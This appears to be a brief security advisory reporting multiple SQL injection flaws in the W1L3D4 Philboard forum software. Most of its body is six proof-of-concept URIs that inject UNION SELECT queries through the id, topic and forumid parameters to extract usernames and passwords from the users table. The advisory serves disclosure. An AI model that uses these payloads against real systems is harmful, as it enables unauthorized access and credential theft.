|
W1L3D4 Philboard Multiple SQL Injection Vulnerabilities
Attackers can use a browser to exploit these issues. The following proof-of-concept URIs are available: http://www.example.com/lab/philboard/philboard_reply.asp?id=1+union+select+0,1,2,3,4,5,6,7,8,username,1,9,0,1,2+from+users http://www.example.com/lab/philboard/philboard_reply.asp?id=1+union+select+0,1,2,3,4,5,6,7,8,password,1,9,0,1,2+from+users http://www.example.com/lab/philboard/philboard_reply.asp?topic=1+union+select+0,username,2,3,4,5,6+from+users http://www.example.com/lab/philboard/philboard_reply.asp?topic=1+union+select+0,password,2,3,4,5,6+from+users http://www.example.com/lab/philboard/philboard_newtopic.asp?forumid=1+union+select+0,password,2,3,4,5+from+users http://www.example.com/lab/philboard/philboard_newtopic.asp?forumid=1+union+select+0,username,2,3,4,5+from+users |
|
|
Privacy Statement |